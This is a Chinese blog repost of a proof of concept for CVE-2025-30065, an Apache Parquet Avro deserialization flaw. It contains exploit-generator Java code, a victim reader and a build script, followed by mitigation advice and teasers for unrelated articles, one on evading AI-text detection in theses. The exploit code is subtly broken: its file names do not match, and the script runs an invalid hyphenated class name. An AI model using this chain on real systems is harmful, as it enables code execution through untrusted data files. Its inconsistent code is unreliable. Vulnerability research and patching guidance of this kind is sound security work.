news 2026/5/19 15:32:24

Apache Parquet Avro反序列化漏洞POC:CVE-2025-30065

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Apache Parquet Avro反序列化漏洞POC:CVE-2025-30065

Apache Parquet Avro反序列化漏洞POC:CVE-2025-30065

⚠️ 风险概述

  • 严重性:CVSS评分10.0(严重☠️)
  • 攻击方式:攻击者可构造恶意Parquet文件,其嵌入的Avro模式旨在触发任意Java类的实例化。
  • 后果:在特定条件下,可导致远程代码执行(RCE)

功能特性

本POC项目完整演示了CVE-2025-30065漏洞的利用链:

  • 恶意文件生成ParquetExploitGenerator类创建包含恶意Avro模式的Parquet文件。
  • 漏洞触发模拟ParquetVictim类模拟受害者应用程序读取恶意Parquet文件。
  • 依赖管理自动化:通过Shell脚本自动处理Maven依赖解析与项目编译。
  • 跨平台payload(历史参考)PayloadRecord类展示了静态初始化块中的命令执行逻辑(在新版POC中已被更隐蔽的类实例化逻辑覆盖)。

安装指南

前置要求

  • Java 8+
  • Maven

安装步骤

项目提供了自动化构建脚本CVE-2025-30065.sh

  1. 确保脚本具有可执行权限:
    sudochmod+x CVE-2025-30065.sh
  2. 运行脚本,它将自动解析依赖、编译所有Java文件并执行完整的POC链条:
    ./CVE-2025-30065.sh

使用说明

运行自动化脚本后,将按顺序执行以下操作:

  1. 生成恶意Parquet文件:使用ParquetExploitGenerator创建一个名为exploit-jeditorpane.parquet的文件,其Avro模式的默认值字段被精心构造为实例化javax.swing.JEditorPane类。
  2. 模拟受害者读取ParquetVictim应用程序读取该文件,在反序列化Avro模式并处理默认值时触发目标类的实例化。

基础工作流程

整个漏洞利用的核心流程封装在Shell脚本中,其逻辑如下:

  1. 使用Maven解析项目依赖并生成类路径文件。
  2. 编译所有必要的Java源代码。
  3. 运行漏洞生成器创建恶意文件。
  4. 运行受害者程序触发漏洞。

核心代码

1. 恶意Parquet文件生成器 (ParquetExploitGenerator.java)

/** * @author Blackash * @version 1.3 * @license For authorized security research and educational purposes only. * * Generates a Parquet file with a crafted Avro schema to demonstrate CVE-2025-30065, * aligned with the vulnerability logic observed in the official Apache patch. * * This version avoids using custom classes and instead leverages a standard Java class * (javax.swing.JEditorPane) known to exhibit side effects when deserialized. * */importorg.apache.avro.Schema;importorg.apache.hadoop.conf.Configuration;importorg.apache.hadoop.fs.Path;importorg.apache.parquet.avro.AvroParquetWriter;importorg.apache.parquet.hadoop.ParquetWriter;importjava.io.IOException;publicclassParquetExploitGenerator{publicstaticvoidmain(String[]args)throwsIOException{// 默认输出文件名为 exploit-jeditorpane.parquetStringoutputFile=args.length>0?args[0]:"exploit-jeditorpane.parquet";// 恶意Avro模式定义:其‘trigger’字段的类型被设置为‘javax.swing.JEditorPane’记录StringmaliciousSchema="{"+"\"type\": \"record\","+"\"name\": \"ExploitRecord\","+"\"fields\": ["+" {\"name\": \"trigger\","+" \"type\": {\"type\": \"record\", \"name\": \"javax.swing.JEditorPane\", \"fields\": []},"+" \"default\": {}"// 默认值为空对象,触发目标类实例化+" }"+"]"+"}";// 解析模式Schemaschema=newSchema.Parser().parse(maliciousSchema);Pathpath=newPath(outputFile);Configurationconf=newConfiguration();// 使用AvroParquetWriter写入文件try(ParquetWriter<Object>writer=AvroParquetWriter.builder(path).withSchema(schema).withConf(conf).build()){writer.write(null);}System.out.println("[+] Malicious Parquet file generated: "+outputFile);System.out.println("[!] Schema instantiates javax.swing.JEditorPane via default value.");}}

2. 受害者应用程序 (ParquetVictim.java)

packagevictim;importorg.apache.avro.generic.GenericRecord;importorg.apache.parquet.avro.AvroParquetReader;importorg.apache.parquet.hadoop.ParquetReader;importorg.apache.hadoop.conf.Configuration;importorg.apache.hadoop.fs.Path;publicclassParquetVictim{publicstaticvoidmain(String[]args)throwsException{// 读取恶意Parquet文件Pathpath=newPath("exploit.parquet");ParquetReader<GenericRecord>reader=AvroParquetReader.<GenericRecord>builder(path).withConf(newConfiguration()).build();// 读取记录,此操作会触发Avro模式中默认值的反序列化,从而实例化恶意类GenericRecordrecord=reader.read();System.out.println("Record loaded: "+record);// this triggers instantiation of default}}

3. 自动化构建与执行脚本 (CVE-2025-30065.sh)

#!/bin/bashBASE_DIR=$(pwd)BUILD_DIR="$BASE_DIR/build/classes"CP_FILE="$BASE_DIR/cp.txt"JAR_DEPS=""# 检查Maven并解析依赖ifcommand-v mvn&>/dev/null;thenecho"[+] Resolving dependencies with Maven..."mvn dependency:build-classpath -Dmdep.outputFile=cp.txt>/dev/nullif[!-f"$CP_FILE"];thenecho"[-] Failed to generate classpath (cp.txt)."exit1fiJAR_DEPS=$(cat"$CP_FILE")elseecho"[-] Maven not found. Please install Maven and run again."exit1fi# 创建构建目录mkdir-p"$BUILD_DIR"echo"[+] Compiling PayloadRecord.java..."javac -d"$BUILD_DIR"PayloadRecord.java||exit1echo"[+] Compiling ParquetExploitGenerator..."javac -cp".:$BUILD_DIR:$JAR_DEPS"-d"$BUILD_DIR"POC-CVE-2025-30065-ParquetExploitGenerator.java||exit1echo"[+] Running exploit generator..."java -cp".:$BUILD_DIR:$JAR_DEPS"POC-CVE-2025-30065-ParquetExploitGenerator||exit1echo"[+] Compiling ParquetVictim.java..."javac -cp".:$BUILD_DIR:$JAR_DEPS"-d"$BUILD_DIR"ParquetVictim.java||exit1echo"[+] Running victim (payload should trigger)..."java -cp".:$BUILD_DIR:$JAR_DEPS"ParquetVictim

安全建议与缓解措施

  1. 立即更新:将 Apache Parquet Java 库升级至1.15.1 或更高版本
  2. 启用类允许列表
    • 配置org.apache.parquet.avro.SERIALIZABLE_PACKAGES,仅允许受信任的包(避免使用*)。
    • 使用org.apache.avro.TRUSTED_PACKAGES来限制Avro模式行为。
  3. 来源控制:避免处理来自不可信来源的Parquet文件,或对文件进行安全扫描。

免责声明

本项目内容仅供教育研究及安全意识提升之目的,旨在揭示Apache Parquet中CVE-2025-30065安全漏洞的原理。任何信息均不鼓励或支持恶意活动、未经授权的系统访问或漏洞利用
请确保您拥有测试目标系统的授权,并遵循负责任的披露流程及法律边界。作者不对信息的任何误用负责。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ4lCdOI9nDKouWcoabNKkPM
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/13 0:10:43

AIGC检测率怎么降低?ChatGPT写的论文这样处理

AIGC检测率怎么降低&#xff1f;ChatGPT写的论文这样处理 ChatGPT论文的降AI全攻略 AIGC检测率怎么降低&#xff1f;用ChatGPT写论文的同学越来越多&#xff0c;但AI率动辄90%以上。这篇教程帮你解决问题。 ChatGPT论文的典型特征 ChatGPT生成的内容有明显标记&#xff1a;…

作者头像 李华
网站建设 2026/5/15 6:51:33

基于python OpenCV的车牌识别计费系统

基于Python OpenCV的车牌识别计费系统设计 第一章 绪论 停车场、高速公路等场景的车牌识别计费是智慧交通的核心应用环节&#xff0c;传统人工计费模式效率低、易出错&#xff0c;而商用车牌识别系统成本高、适配性差&#xff0c;难以满足中小场景的个性化需求。Python语言具…

作者头像 李华
网站建设 2026/5/14 7:07:52

计算机毕业设计之基于springboot的农产品信息管理系统

二十一世纪我们的社会进入了信息时代&#xff0c;信息管理系统的建立&#xff0c;大大提高了人们信息化水平。传统的管理方式对时间、地点的限制太多&#xff0c;而在线管理系统刚好能满足这些需求&#xff0c;在线管理系统突破了传统管理方式的局限性。于是本文针对这一需求设…

作者头像 李华
网站建设 2026/5/11 2:21:07

ZYNQ让卫星在太空“换脑”:基于动态部分可重构的星载智能处理革命

想象一下,一颗卫星在轨运行五年后,不是因硬件过时而被淘汰,而是通过“太空换脑手术”获得全新的智能处理能力——这正是动态部分可重构技术为航天领域带来的革命。 当传统卫星发射升空后,它的硬件功能就被永久固定,如同化石般无法进化。而太空环境中的单粒子效应等辐射威胁…

作者头像 李华